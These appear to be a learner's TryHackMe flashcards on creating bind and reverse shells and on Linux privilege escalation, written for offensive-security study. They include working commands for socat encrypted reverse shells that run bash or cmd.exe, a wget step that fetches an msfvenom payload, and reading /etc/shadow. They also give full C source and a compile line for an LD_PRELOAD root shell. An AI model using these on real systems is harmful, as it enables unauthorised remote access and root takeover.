THM 1/9/2023 Creating Shells and Priv Esc Flashcards
What are the two kinds of shells you can create?
Bind and Reverse
What are the pros and cons of bind shells?
Con: firewalls may prevent this type of connection from happening
Pro: straightforward way of creating a shell
What are the pros and cons of reverse shells?
Pro: good way to bypass firewalls
Drawback: you must configure your own network to accept the shell
*You will very likely default to using this type of connection method
What are two common tools to create shells?
netcat and socat
Both are (or can be) Linux- and Windows-friendly tools
What are the pros and cons of netcat?
Explain the flags in this example:
nc -lvnp <port>
What are best practices when opening a Netcat listener?
Pros: easy to spin up and good for
- banner grabbing
- enumeration
- creating shells
Cons
- Very unstable (shells), but this can be improved
- Often removed from networks due to its security implications
- Insecure when sending commands back and forth
Example:
-l = listen
-v = verbose
-n = no DNS lookup
-p = port
Best Practices:
- Use common ports (better chance of not getting blocked)
What are the pros and cons of socat?
Same as netcat but usually more stable
Drawbacks?
- Syntax is more difficult
- Not installed by default in Linux distros (as compared to netcat)
What are 3 techniques to stabilize Netcat?
*Python
Commands to run:
1) python -c 'import pty;pty.spawn("/bin/bash")'
2) export TERM=xterm ("gives you basic terminal commands")
3) stty raw -echo; fg ("backgrounds the shell and turns off our own terminal echo")
RLWRAP
SOCAT
*Only works on Linux
What are the steps to create an encrypted shell with SOCAT?
Generate a cert
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
Merge created files into a single PEM
cat shell.key shell.crt > shell.pem
Set up reverse shell
socat openssl-listen:<PORT>,cert=shell.pem,verify=0 -
*verify=0 means not to check that the cert was signed by a trusted certificate authority
socat openssl:IP:PORT,cert=shell.pem,verify=0 EXEC:/bin/bash
OR
socat openssl:IP:PORT,verify=0,cert=shell.pem EXEC:cmd.exe,pipes
Provide a way to upload a payload created with msfvenom
Create a simple HTTP server using Python
Use wget on the target to grab the payload from the listener
*Remember to move into a directory you are allowed to execute from
Modify permissions and execute (gain root privileges or better permissions)
How do you see which programs you have permission to?
sudo -l
Some applications may not have a known exploit (post exploitation for priv esc). What are two ways to leak information?
1) Try to view files/folders you are not allowed to (e.g. /etc/shadow) using the commands you are allowed to run.
2) Leverage app functions listed via "sudo -l"
*Look for "env_keep+=LD_PRELOAD"
**LD_PRELOAD is an environment variable that tells a program to load (preload) the given shared libraries before any others
If env_keep exists, create and compile this C code (shell.c):
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs when the library is preloaded; drop LD_PRELOAD so child processes are not affected */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
Compile it to a shared object:
gcc -fPIC -shared -o shell.so shell.c -nostartfiles